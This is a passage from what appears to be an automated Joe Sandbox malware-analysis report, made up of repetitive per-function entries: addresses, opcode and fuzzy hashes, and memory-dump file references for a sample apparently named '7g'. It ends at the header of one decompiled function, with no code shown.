                                                                                                    • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                                                                    • Instruction Fuzzy Hash: 17022832A043118FC708CF28C5902B9BBE2FBC5354F144A2FE596976A4D778D8C9CB89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004191D0 Relevance: .4, Instructions: 381COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4d8676a69d13c9b43146e04b1aa8a76314400912d623349af273bd02723f7f7b
                                                                                                    • Instruction ID: c07ad63e2acd01f2b1e87356cb371a5974b7035dcde88adb2860db720a6796c9
                                                                                                    • Opcode Fuzzy Hash: 4d8676a69d13c9b43146e04b1aa8a76314400912d623349af273bd02723f7f7b
                                                                                                    • Instruction Fuzzy Hash: CCF19B31604A02AFC358CF25C590AAAF7E1FF89314F10462EE95983B50E734BDA5CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B5B0 Relevance: .3, Instructions: 320COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                                                                                                    • Instruction ID: 7605a2e5038f15e5a8d4c04090057a222acbdde4ba97f073b10e0214a9e145da
                                                                                                    • Opcode Fuzzy Hash: 0be95466a501aa6df6135e314a315b2d27713a5a1a3cbbde2114f59cc96eeb67
                                                                                                    • Instruction Fuzzy Hash: 23B17FB26012118FC750CF2CC8801157BA2FBC532977987AAC4946F796D33AE857CBD8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D480 Relevance: .3, Instructions: 298COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 652f6a6957f663c46fa7006c862a4b34404880ae2fe0ad60c64723a7cbca903c
                                                                                                    • Instruction ID: 688984eed59d71ca9c55aff4ff5fd0880fe9ac083a716bc194a18f30c4d7d05b
                                                                                                    • Opcode Fuzzy Hash: 652f6a6957f663c46fa7006c862a4b34404880ae2fe0ad60c64723a7cbca903c
                                                                                                    • Instruction Fuzzy Hash: 4ED1D2718483AE4FE394EF9DEC806357762EF84310F498679CB900B6A3D634B615D798
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406A90 Relevance: .2, Instructions: 224COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1a1f832fa8d1c1d7ec3189753c4d11a19fbb8d6140c907419413f0b04ad2762c
                                                                                                    • Instruction ID: 07fd33043efdc5e5ead45e9ab5e262764fecfb0a27a15addedfd3d8f13fdfcc0
                                                                                                    • Opcode Fuzzy Hash: 1a1f832fa8d1c1d7ec3189753c4d11a19fbb8d6140c907419413f0b04ad2762c
                                                                                                    • Instruction Fuzzy Hash: DA6141B2708211CFE708CF59E580A66B3E5EB98320B1684BFD146CB3A1D775DC51C758
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00414B70 Relevance: .2, Instructions: 222COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                                                                                    • Instruction ID: a7d7755cdc37ba40258f474d798bf5a148ac150996c13ecf39ff21648354f776
                                                                                                    • Opcode Fuzzy Hash: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                                                                                    • Instruction Fuzzy Hash: 8C81F3B2D447298BD710CF88ECC4596B3A1FB88308F0A467DDE591B352D2B9B915DBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00414238 Relevance: .2, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0b136f81747db919f219f09651dafa56c20332f88b86ec052b9e872d0acfe145
                                                                                                    • Instruction ID: 12094ed686c825abc725d4202b594c692dea433d28c6c45becd9c419ceb188bb
                                                                                                    • Opcode Fuzzy Hash: 0b136f81747db919f219f09651dafa56c20332f88b86ec052b9e872d0acfe145
                                                                                                    • Instruction Fuzzy Hash: 65A19D71A0824A8BD729CF19D490AEEB7F2FFC4308F14492EE8868B341D739A595CB45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00414E90 Relevance: .2, Instructions: 216COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                                                                    • Instruction ID: 6a5ca0c17ecc37e04ae1d55dff10bbc21e8b5fc9f7ca8496ae2c2bb021c63a99
                                                                                                    • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                                                                                    • Instruction Fuzzy Hash: 7F918FB2C1871A8BD314CF18D88029AB7E0FB88308F45067DED9A97342D739EA55CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B537F Relevance: .2, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f5738a89687271e3d77c0681ee268b4086bbbb0eaec55981388f29020d9bd24
                                                                                                    • Instruction ID: 2d6a89a11f500d68538a06b7edbd53fa10bd5179fee585b4dc6128e64eff6e7e
                                                                                                    • Opcode Fuzzy Hash: 4f5738a89687271e3d77c0681ee268b4086bbbb0eaec55981388f29020d9bd24
                                                                                                    • Instruction Fuzzy Hash: E351AD73E204354AE74CCF24DC617A67292E788310F4AD2B99D8BBB7E6CD78985087C4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C8374 Relevance: .2, Instructions: 167COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                                                                    • Instruction ID: cc5d72757bc8cfd02222a98355599bfd7b2e0eeb27da4dd5cb03547b1f8bf61a
                                                                                                    • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                                                                                    • Instruction Fuzzy Hash: D3514A72E0061A9BDB08DF98D991BADB7F2EB89304F24816DD512E7381DB749F41CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040AA30 Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f9d20438e4b1a64ab9ac97cafec001425833457f19ed42220e3a16c188ac4bc
                                                                                                    • Instruction ID: f24a00430ac08d93d00555645bcd385aa3c095df8aa14127009363f2e6cb3416
                                                                                                    • Opcode Fuzzy Hash: 6f9d20438e4b1a64ab9ac97cafec001425833457f19ed42220e3a16c188ac4bc
                                                                                                    • Instruction Fuzzy Hash: 6741E672F1063006F3488F268C802A62BC3CBC9356B45C63DC6A5CB6D9DABDC55782A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CA6D7 Relevance: .1, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                                                                    • Instruction ID: 6a31b6c63789dc2f80fcb229a2484bfb06a6f7947dd54c52ba9a674663248aa7
                                                                                                    • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                                                                    • Instruction Fuzzy Hash: CA31142B7A0805178B1DC92BCC02BAF91636BE422A70ECF399C04CAF55D52CC8124205
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C3C0 Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                                                                    • Instruction ID: 5655580d4998944a1a84eaee920c4c9d22fd9b1b865c2477b363364e67031fda
                                                                                                    • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                                                                    • Instruction Fuzzy Hash: F1311673500A158BF6208B298DD437B7213FBD2364F29873BDD56A77E8DA389C0A9149
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C520 Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                                                                                    • Instruction ID: 940d7a32a8d5c9974e0441c0f5b619e23d9e9d44a1da93d3400e4743ce67bc9f
                                                                                                    • Opcode Fuzzy Hash: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
                                                                                                    • Instruction Fuzzy Hash: D8318A77900A25DBF22087198DC07676213DBD2374F198B37D856B33E8CA3AAC43914D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041D2D0 Relevance: .1, Instructions: 88COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e38e8542b507e7ae90338d559bc5c153515782df8aa347aeb1d3ffa071d4c236
                                                                                                    • Instruction ID: cc7ecf31cf1e496c2d353a6cb03d3726784e3ede7a673f772c7b241438f049a7
                                                                                                    • Opcode Fuzzy Hash: e38e8542b507e7ae90338d559bc5c153515782df8aa347aeb1d3ffa071d4c236
                                                                                                    • Instruction Fuzzy Hash: 2C2148B1F047A707E3109E6C8CC06B577A2AFC1301F8D457BD9A4CFA86E57988969364
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004225BA Relevance: .1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                                                                    • Instruction ID: 21e99bf20fd9783d69de24a748e6f3745194960b9d4299826692e26a9167331a
                                                                                                    • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                                                                                    • Instruction Fuzzy Hash: 5921377361043567C705DF2DF988677B3E1FFD4319FA78A2BE9828B280C628E841D690
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004226A1 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
                                                                                                    • Instruction ID: 5e18a687b13f81fe0d18c33a0c7c5df03f579ab91b7101527898da13e8995685
                                                                                                    • Opcode Fuzzy Hash: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
                                                                                                    • Instruction Fuzzy Hash: 082147336051249BC701EF6AE9846AB73D2FFC8360FA7C53EED8147244C634EA068654
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004213A0 Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                                                                    • Instruction ID: eeb0d497c936cf1b1a879b9d8b94dd2e4edd8dbb6757f15208f412ad513e4ff4
                                                                                                    • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                                                                    • Instruction Fuzzy Hash: 9E218E77320A0647E74C8A38D93737522D1A705318F98A22DEA6BCE2C2D77EC457C384
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00418250 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
                                                                                                    • Instruction ID: 4bac685e1bb8f2680d0ffeed39d7cf4fcf1a8060a22d91128463f1becc15158a
                                                                                                    • Opcode Fuzzy Hash: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
                                                                                                    • Instruction Fuzzy Hash: C60112651966898DD781DA79C490748FE80F756302F9CC3E4D088CBB42D99DC58BC361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413110 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                                                                                    • Instruction ID: d8446cac34e0294782cb46cc37161fc0626df7f31cbc673177bcd79c6ae1b97c
                                                                                                    • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                                                                                    • Instruction Fuzzy Hash: B901D17291462E57DB189F08CC41132B390FB85312F49823ADD479B385E734F970C6D4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EA4C7 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 97%
                                                                                                    			E003EA4C7(intOrPtr __ecx, intOrPtr __edx) {
